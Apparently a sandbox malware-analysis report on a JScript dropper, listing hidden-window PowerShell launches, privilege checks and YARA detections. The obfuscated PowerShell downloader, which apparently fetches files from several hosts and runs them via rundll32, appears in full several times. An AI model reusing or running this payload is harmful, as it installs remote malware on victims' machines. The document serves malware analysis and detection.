cAawBBAFkAZwBCAGgAQQBHADQAQQBiAHcAQgBWAEEARwA0AEEAYwB3AEIAaABBAEcATQBBAGMAZwBCAGwAQQBHAFEAQQBMAGcAQgB5AEEARwBFAEEAWQB3AEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYwBvAHIAawBpAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBjAEEAQgB3AEEARwA4AEEAYwB3AEIAcABBAEgAUQBBAGEAUQBCAHcAQQBHADgAQQBiAEEAQgBoAEEASABJAEEAUQB3AEIANQBBAEgAUQBBAGIAdwBCAHQAQQBHAGsAQQBZAHcAQgB5AEEARwA4AEEAYwB3AEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB2AEEARwBzAEEAYQBRAEIAdQBBAEcAYwBBAFcAUwA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgAwAEEARwBVAEEAYgBBAEIAbABBAEgATQBBAFkAdwBCAHYAQQBIAEEAQQBhAFEAQgBqAEEARgBVAEEAYgBnAEIAaABBAEgAQQBBAGMAQQBCAHMAQQBHAEUAQQBkAFEAQgBrAEEARwBVAEEAWgBBAEEAdQBBAEcATQBBAFkAUQBCAHoAQQBHAEUAQQBXAFMAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBaAEEAQgBsAEEASABJAEEAWgBRAEIANQBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBhAHcAQgBwAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGIAZwBBAD0AIgA7ACQAYgBhAHIAZwBoAGUAcwB0AHMAUwBhAHAAcgBvAGIAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE4AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABVAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAyADkAOAA0ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBVAEEAYgBnAEIAawBBAEcAVQBBAGMAZwBCADEAQQBIAFEAQQBhAFEAQgBzAEEARwBrAEEAZQBnAEIAbABBAEMANABBAFIAdwBCAHYAQQBIAFkAQQBaAFEAQgB5AEEARwA0AEEAYQBRAEIAdQBBAEcAYwBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgBpAGEAbgBuAHUAYQBsAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcARQBBAGIAQQBCAHMAQQBHAEUAQQBhAEEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEgAQQBBAGQAUQBCADAAQQBHAFUAQQBjAGcAQQA9AGQAWQBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAFUAQQBiAGcAQgBzAEEARwBFAEEAYwBnAEIAbgBBAEcAVQBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgBQAEEARwBNAEEAZABBAEIAdgBBAEcAUQBBAFkAUQBCAGoAQQBIAFEAQQBlAFEAQgBzAEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAPQBkAFkASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABFAEEATgBnAEEANQBBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAFEAQQAxAEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA="

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 25, 2023, 10:43 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\ProgramData\Heteromorphic.js" blateroonPursership WhoosisInterall scatbacksNanoinstruction filepath: wscript	1	1	0
ShellExecuteExW May 25, 2023, 10:44 a.m.	show_type: 0 filepath_r: powershell parameters: -encodedcommand "JABFAGwAdQBhAHQAZQBkAEEAcABsAGUAYwB0AHIAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABFAEEAZABRAEIAcABBAEgATQBBAGEAUQBCAG4AQQBHADQAQQBZAFEAQgBzAEEAQwA0AEEAWgBRAEIAdQBBAEcAYwBBAGEAUQBCAHUAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAUwBjAGEAcgBjAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGUAUQBCAGgAQQBHADQAQQBiAHcAQgB3AEEASABNAEEAYQBRAEIAaABBAEYAQQBBAGMAZwBCAGgAQQBHAFUAQQBjAHcAQgBwAEEARwBRAEEAYQBRAEIAaABBAEMANABBAFoAQQBCAHAAQQBIAEkAQQBaAFEAQgBqAEEASABRAEEAYgB3AEIAeQBBAEgAawBBAFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEAYwBnAEIAcABBAEcAVQBBAEwAZwBCADAAQQBHAGcAQQBaAFEAQgBoAEEASABRAEEAWgBRAEIAeQBBAEEAPQA9AFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEcAVQBBAGMAZwBCAGgAQQBIAFUAQQBiAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFUAQQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBVAEEAYwB3AEEAdQBBAEcATQBBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEAQQA9AD0AUgBzAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADMAQQBDADQAQQBOAFEAQQAwAEEAQwA0AEEATgBBAEEANABBAEEAPQA9ACIAOwAkAFIAZQBtAGkAZwByAGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAQQBBAEwAZwBBAHgAQQBEAFEAQQBOAEEAQQB2AEEASABvAEEAYgB3AEIAMABBAEQAZwBBAE0AZwBBAHYAQQBFAFEAQQBVAEEAQgBGAEEARwBjAEEAWQBnAEEAPQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB2AEEASABRAEEATAB3AEIAVQBBAEYAWQBBAGMAdwBCAEIAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBFAGMAQQBXAGcAQQAwAEEARgBJAEEAUwBRAEIARwBBAEYAbwBBAFEAZwBCAHUAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHYAQQBEAFEAQQBlAEEAQgBJAEEARwA4AEEAYwBRAEIAcwBBAEcAMABBAFcAQQBCAFYAQQBHAGsAQQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBFAE0AQQBNAGcAQgBwAEEARwBJAEEAYQBRAEIAUwBBAEgATQBBAFEAdwBCAHkAQQBFADgAQQBXAEEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAcgBpAG0AbwBsAGUAYwB1AGwAYQByAEMAZQByAGEAdABvAGQAaQBkAGEAZQAgAGkAbgAgACQAUgBlAG0AaQBnAHIAYQB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAFQAcABlAE4AIgApACAAewB0AHIAeQAgAHsAJABEAGUAbABpAHEAdQBpAHUAbQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAVQBBAGIAQQBCAHAAQQBIAEEAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAaABBAEcAVQBBAFMAQQBCAHAAQQBHAHcAQQBiAEEAQgB2AEEARwBFAEEAWgBRAEIAawBBAEMANABBAFoAQQBCAHIAQQBBAD0APQBrAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEgAWQBBAFoAUQBCAHkAQQBHAFUAQQBaAEEAQgBFAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGsAQQBHAFUAQQBaAEEAQgBzAEEASABrAEEATABnAEIAbQBBAEcAOABBAGMAZwBCAHoAQQBHAEUAQQBiAEEAQgBsAEEAQQA9AD0AIgA7ACQAUABvAHIAbwBwAG8AcgBvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBFAEEAYgBBAEIAbABBAEgATQBBAFkAUQBCADEAQQBIAEkAQQBkAFEAQgB6AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHkAQQBHAGsAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAaQBBAEcARQBBAGMAZwBCAG4AQQBHAEUAQQBhAFEAQgB1AEEASABNAEEAIgA7ACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVAByAGkAbQBvAGwAZQBjAHUAbABhAHIAQwBlAHIAYQB0AG8AZABpAGQAYQBlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwA7ACQAUwB0AHUAbgBuAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABNAEEAWQB3AEIAeQBBAEcAawBBAFkAZwBCAGgAQQBHADQAQQBiAHcAQgBWAEEARwA0AEEAYwB3AEIAaABBAEcATQBBAGMAZwBCAGwAQQBHAFEAQQBMAGcAQgB5AEEARwBFAEEAWQB3AEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYwBvAHIAawBpAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBjAEEAQgB3AEEARwA4AEEAYwB3AEIAcABBAEgAUQBBAGEAUQBCAHcAQQBHADgAQQBiAEEAQgBoAEEASABJAEEAUQB3AEIANQBBAEgAUQBBAGIAdwBCAHQAQQBHAGsAQQBZAHcAQgB5AEEARwA4AEEAYwB3AEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB2AEEARwBzAEEAYQBRAEIAdQBBAEcAYwBBAFcAUwA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgAwAEEARwBVAEEAYgBBAEIAbABBAEgATQBBAFkAdwBCAHYAQQBIAEEAQQBhAFEAQgBqAEEARgBVAEEAYgBnAEIAaABBAEgAQQBBAGMAQQBCAHMAQQBHAEUAQQBkAFEAQgBrAEEARwBVAEEAWgBBAEEAdQBBAEcATQBBAFkAUQBCAHoAQQBHAEUAQQBXAFMAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBaAEEAQgBsAEEASABJAEEAWgBRAEIANQBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBhAHcAQgBwAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGIAZwBBAD0AIgA7ACQAYgBhAHIAZwBoAGUAcwB0AHMAUwBhAHAAcgBvAGIAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE4AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABVAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAyADkAOAA0ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBVAEEAYgBnAEIAawBBAEcAVQBBAGMAZwBCADEAQQBIAFEAQQBhAFEAQgBzAEEARwBrAEEAZQBnAEIAbABBAEMANABBAFIAdwBCAHYAQQBIAFkAQQBaAFEAQgB5AEEARwA0AEEAYQBRAEIAdQBBAEcAYwBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgBpAGEAbgBuAHUAYQBsAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcARQBBAGIAQQBCAHMAQQBHAEUAQQBhAEEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEgAQQBBAGQAUQBCADAAQQBHAFUAQQBjAGcAQQA9AGQAWQBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAFUAQQBiAGcAQgBzAEEARwBFAEEAYwBnAEIAbgBBAEcAVQBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgBQAEEARwBNAEEAZABBAEIAdgBBAEcAUQBBAFkAUQBCAGoAQQBIAFEAQQBlAFEAQgBzAEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAPQBkAFkASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABFAEEATgBnAEEANQBBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAFEAQQAxAEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA=" filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 25, 2023, 10:44 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\ProgramData\Heteromorphic.js" blateroonPursership WhoosisInterall scatbacksNanoinstruction
parent_process	wscript.exe	martian_process	wscript "C:\ProgramData\Heteromorphic.js" blateroonPursership WhoosisInterall scatbacksNanoinstruction
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABFAGwAdQBhAHQAZQBkAEEAcABsAGUAYwB0AHIAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABFAEEAZABRAEIAcABBAEgATQBBAGEAUQBCAG4AQQBHADQAQQBZAFEAQgBzAEEAQwA0AEEAWgBRAEIAdQBBAEcAYwBBAGEAUQBCAHUAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAUwBjAGEAcgBjAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGUAUQBCAGgAQQBHADQAQQBiAHcAQgB3AEEASABNAEEAYQBRAEIAaABBAEYAQQBBAGMAZwBCAGgAQQBHAFUAQQBjAHcAQgBwAEEARwBRAEEAYQBRAEIAaABBAEMANABBAFoAQQBCAHAAQQBIAEkAQQBaAFEAQgBqAEEASABRAEEAYgB3AEIAeQBBAEgAawBBAFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEAYwBnAEIAcABBAEcAVQBBAEwAZwBCADAAQQBHAGcAQQBaAFEAQgBoAEEASABRAEEAWgBRAEIAeQBBAEEAPQA9AFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEcAVQBBAGMAZwBCAGgAQQBIAFUAQQBiAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFUAQQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBVAEEAYwB3AEEAdQBBAEcATQBBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEAQQA9AD0AUgBzAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADMAQQBDADQAQQBOAFEAQQAwAEEAQwA0AEEATgBBAEEANABBAEEAPQA9ACIAOwAkAFIAZQBtAGkAZwByAGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAQQBBAEwAZwBBAHgAQQBEAFEAQQBOAEEAQQB2AEEASABvAEEAYgB3AEIAMABBAEQAZwBBAE0AZwBBAHYAQQBFAFEAQQBVAEEAQgBGAEEARwBjAEEAWQBnAEEAPQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB2AEEASABRAEEATAB3AEIAVQBBAEYAWQBBAGMAdwBCAEIAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBFAGMAQQBXAGcAQQAwAEEARgBJAEEAUwBRAEIARwBBAEYAbwBBAFEAZwBCAHUAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHYAQQBEAFEAQQBlAEEAQgBJAEEARwA4AEEAYwBRAEIAcwBBAEcAMABBAFcAQQBCAFYAQQBHAGsAQQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBFAE0AQQBNAGcAQgBwAEEARwBJAEEAYQBRAEIAUwBBAEgATQBBAFEAdwBCAHkAQQBFADgAQQBXAEEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAcgBpAG0AbwBsAGUAYwB1AGwAYQByAEMAZQByAGEAdABvAGQAaQBkAGEAZQAgAGkAbgAgACQAUgBlAG0AaQBnAHIAYQB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAFQAcABlAE4AIgApACAAewB0AHIAeQAgAHsAJABEAGUAbABpAHEAdQBpAHUAbQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAVQBBAGIAQQBCAHAAQQBIAEEAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAaABBAEcAVQBBAFMAQQBCAHAAQQBHAHcAQQBiAEEAQgB2AEEARwBFAEEAWgBRAEIAawBBAEMANABBAFoAQQBCAHIAQQBBAD0APQBrAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEgAWQBBAFoAUQBCAHkAQQBHAFUAQQBaAEEAQgBFAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGsAQQBHAFUAQQBaAEEAQgBzAEEASABrAEEATABnAEIAbQBBAEcAOABBAGMAZwBCAHoAQQBHAEUAQQBiAEEAQgBsAEEAQQA9AD0AIgA7ACQAUABvAHIAbwBwAG8AcgBvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBFAEEAYgBBAEIAbABBAEgATQBBAFkAUQBCADEAQQBIAEkAQQBkAFEAQgB6AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHkAQQBHAGsAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAaQBBAEcARQBBAGMAZwBCAG4AQQBHAEUAQQBhAFEAQgB1AEEASABNAEEAIgA7ACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVAByAGkAbQBvAGwAZQBjAHUAbABhAHIAQwBlAHIAYQB0AG8AZABpAGQAYQBlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwA7ACQAUwB0AHUAbgBuAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABNAEEAWQB3AEIAeQBBAEcAawBBAFkAZwBCAGgAQQBHADQAQQBiAHcAQgBWAEEARwA0AEEAYwB3AEIAaABBAEcATQBBAGMAZwBCAGwAQQBHAFEAQQBMAGcAQgB5AEEARwBFAEEAWQB3AEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYwBvAHIAawBpAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBjAEEAQgB3AEEARwA4AEEAYwB3AEIAcABBAEgAUQBBAGEAUQBCAHcAQQBHADgAQQBiAEEAQgBoAEEASABJAEEAUQB3AEIANQBBAEgAUQBBAGIAdwBCAHQAQQBHAGsAQQBZAHcAQgB5AEEARwA4AEEAYwB3AEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB2AEEARwBzAEEAYQBRAEIAdQBBAEcAYwBBAFcAUwA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgAwAEEARwBVAEEAYgBBAEIAbABBAEgATQBBAFkAdwBCAHYAQQBIAEEAQQBhAFEAQgBqAEEARgBVAEEAYgBnAEIAaABBAEgAQQBBAGMAQQBCAHMAQQBHAEUAQQBkAFEAQgBrAEEARwBVAEEAWgBBAEEAdQBBAEcATQBBAFkAUQBCAHoAQQBHAEUAQQBXAFMAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBaAEEAQgBsAEEASABJAEEAWgBRAEIANQBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBhAHcAQgBwAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGIAZwBBAD0AIgA7ACQAYgBhAHIAZwBoAGUAcwB0AHMAUwBhAHAAcgBvA